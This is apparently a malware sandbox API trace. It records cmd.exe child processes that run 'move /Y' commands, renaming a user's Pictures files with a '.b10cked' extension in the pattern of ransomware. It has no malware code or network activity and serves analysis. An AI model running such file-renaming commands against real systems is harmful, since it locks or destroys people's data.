cchData=32 | out: lpLCData="Sat") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0143.791] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0143.791] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0143.792] GetConsoleTitleW (in: lpConsoleTitle=0x3f08c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.792] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.792] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0143.793] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0143.793] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0143.793] _wcsicmp (_String1="move", _String2=")") returned 68 [0143.793] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0143.794] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0143.794] _wcsicmp (_String1="IF", _String2="move") returned -4 [0143.794] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0143.794] _wcsicmp (_String1="REM", _String2="move") returned 5 [0143.794] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0143.796] GetConsoleTitleW (in: lpConsoleTitle=0x2cfa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0143.797] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0143.797] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0143.797] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0143.797] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0143.797] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0143.797] _wcsicmp (_String1="move", _String2="CD") returned 10 [0143.797] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0143.797] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0143.797] _wcsicmp (_String1="move", _String2="REN") returned -5 [0143.797] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0143.797] _wcsicmp (_String1="move", _String2="SET") returned -6 [0143.797] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0143.797] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0143.797] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0143.797] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0143.797] _wcsicmp (_String1="move", _String2="MD") returned 11 [0143.797] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0143.797] _wcsicmp (_String1="move", _String2="RD") returned -5 [0143.797] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0143.797] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0143.797] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0143.797] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0143.797] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0143.797] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0143.797] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0143.797] _wcsicmp (_String1="move", _String2="VER") returned -9 [0143.797] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0143.797] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0143.797] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0143.797] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0143.797] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0143.797] _wcsicmp (_String1="move", _String2="START") returned -6 [0143.797] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0143.797] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0143.797] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0143.799] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.799] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.799] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf82c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf824, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf824*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.799] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.800] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.800] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0143.800] _wcsicmp (_String1="If0lC.jpg", _String2=".") returned 59 [0143.800] _wcsicmp (_String1="If0lC.jpg", _String2="..") returned 59 [0143.801] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg")) returned 0x20 [0143.801] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x401d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0143.801] SetErrorMode (uMode=0x0) returned 0x0 [0143.801] SetErrorMode (uMode=0x1) returned 0x0 [0143.801] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", nBufferLength=0x104, lpBuffer=0x2cf1b4, lpFilePart=0x2cf19c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", lpFilePart=0x2cf19c*="If0lC.jpg") returned 0x23 [0143.801] SetErrorMode (uMode=0x0) returned 0x1 [0143.801] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x13 [0143.801] _wcsicmp (_String1="If0lC.jpg", _String2=".") returned 59 [0143.801] _wcsicmp (_String1="If0lC.jpg", _String2="..") returned 59 [0143.801] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg")) returned 0x20 [0143.801] SetErrorMode (uMode=0x0) returned 0x0 [0143.801] SetErrorMode (uMode=0x1) returned 0x0 [0143.801] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", nBufferLength=0x104, lpBuffer=0x2cf630, lpFilePart=0x2cf3c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", lpFilePart=0x2cf3c8*="If0lC.jpg") returned 0x23 [0143.802] SetErrorMode (uMode=0x0) returned 0x1 [0143.802] SetErrorMode (uMode=0x0) returned 0x0 [0143.802] SetErrorMode (uMode=0x1) returned 0x0 [0143.802] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2cf838, lpFilePart=0x2cf3c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked", lpFilePart=0x2cf3c8*="If0lC.jpg.b10cked") returned 0x2b [0143.802] SetErrorMode (uMode=0x0) returned 0x1 [0143.802] SetLastError (dwErrCode=0x0) [0143.802] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg.b10cked")) returned 0xffffffff [0143.802] GetLastError () returned 0x2 [0143.802] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", fInfoLevelId=0x1, lpFindFileData=0x2ced44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ced44) returned 0x402198 [0143.802] FindNextFileW (in: hFindFile=0x402198, lpFindFileData=0x2ced44 | out: lpFindFileData=0x2ced44) returned 0 [0143.804] GetLastError () returned 0x12 [0143.804] FindClose (in: hFindFile=0x402198 | out: hFindFile=0x402198) returned 1 [0143.805] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", fInfoLevelId=0x1, lpFindFileData=0x401ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x401ac8) returned 0x402198 [0143.805] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2cefdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked", lpFilePart=0x0) returned 0x2b [0143.805] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", nBufferLength=0x104, lpBuffer=0x2cefdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", lpFilePart=0x0) returned 0x23 [0143.805] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg")) returned 0x20 [0143.805] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\if0lc.jpg.b10cked"), dwFlags=0x3) returned 1 [0143.806] FindClose (in: hFindFile=0x402198 | out: hFindFile=0x402198) returned 1 [0143.806] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2cef90 | out: _Buffer=" 1") returned 9 [0143.806] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.806] GetFileType (hFile=0x7) returned 0x2 [0143.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0143.934] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cef1c | out: lpMode=0x2cef1c) returned 1 [0143.934] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.934] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cef50 | out: lpConsoleScreenBufferInfo=0x2cef50) returned 1 [0143.935] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0143.935] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2cef90 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0143.935] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2cef74, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2cef74*=0x1a) returned 1 [0143.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.935] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.935] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.935] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.936] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.936] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.936] SetConsoleInputExeNameW () returned 0x1 [0143.936] GetConsoleOutputCP () returned 0x1b5 [0143.936] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.936] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.936] exit (_Code=0) Process: id = "186" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16f40" os_pid = "0x6f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16631 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16632 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16633 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16634 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 16635 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16636 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16637 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16638 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16639 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 16640 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16691 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16692 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16693 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16694 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16695 start_va = 0x4a0000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 16696 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16697 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16698 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16699 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16700 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16701 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16702 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16703 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16704 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16705 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16706 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16707 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16708 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16709 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16710 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16711 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 16712 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 16713 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 16714 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 243 os_tid = 0x8b8 [0143.544] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efd14 | out: lpSystemTimeAsFileTime=0x2efd14*(dwLowDateTime=0x8f7d01a0, dwHighDateTime=0x1d440a9)) [0143.544] GetCurrentProcessId () returned 0x6f0 [0143.544] GetCurrentThreadId () returned 0x8b8 [0143.544] GetTickCount () returned 0x2cd9a [0143.544] QueryPerformanceCounter (in: lpPerformanceCount=0x2efd0c | out: lpPerformanceCount=0x2efd0c*=20033364736) returned 1 [0143.545] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.545] __set_app_type (_Type=0x1) [0143.545] __p__fmode () returned 0x76b331f4 [0143.545] __p__commode () returned 0x76b331fc [0143.546] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.546] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.546] GetCurrentThreadId () returned 0x8b8 [0143.546] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8b8) returned 0x38 [0143.546] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.546] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.546] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.546] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efca4 | out: phkResult=0x2efca4*=0x0) returned 0x2 [0143.546] VirtualQuery (in: lpAddress=0x2efcdb, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.546] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.546] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.547] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.547] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efc74, dwLength=0x1c | out: lpBuffer=0x2efc74*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.547] GetConsoleOutputCP () returned 0x1b5 [0143.547] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.547] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.547] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.547] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.547] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.548] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.548] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.548] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.548] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.548] GetEnvironmentStringsW () returned 0x4b0150* [0143.548] FreeEnvironmentStringsW (penv=0x4b0150) returned 1 [0143.548] GetEnvironmentStringsW () returned 0x4b0150* [0143.549] FreeEnvironmentStringsW (penv=0x4b0150) returned 1 [0143.549] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec14 | out: phkResult=0x2eec14*=0x40) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x78, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x1, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x1, lpcbData=0x2eec18*=0x1000) returned 0x2 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x0, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x40, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x4, lpData=0x2eec20*=0x40, lpcbData=0x2eec18*=0x4) returned 0x0 [0143.549] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eec1c, lpData=0x2eec20, lpcbData=0x2eec18*=0x1000 | out: lpType=0x2eec1c*=0x0, lpData=0x2eec20*=0x40, lpcbData=0x2eec18*=0x1000) returned 0x2 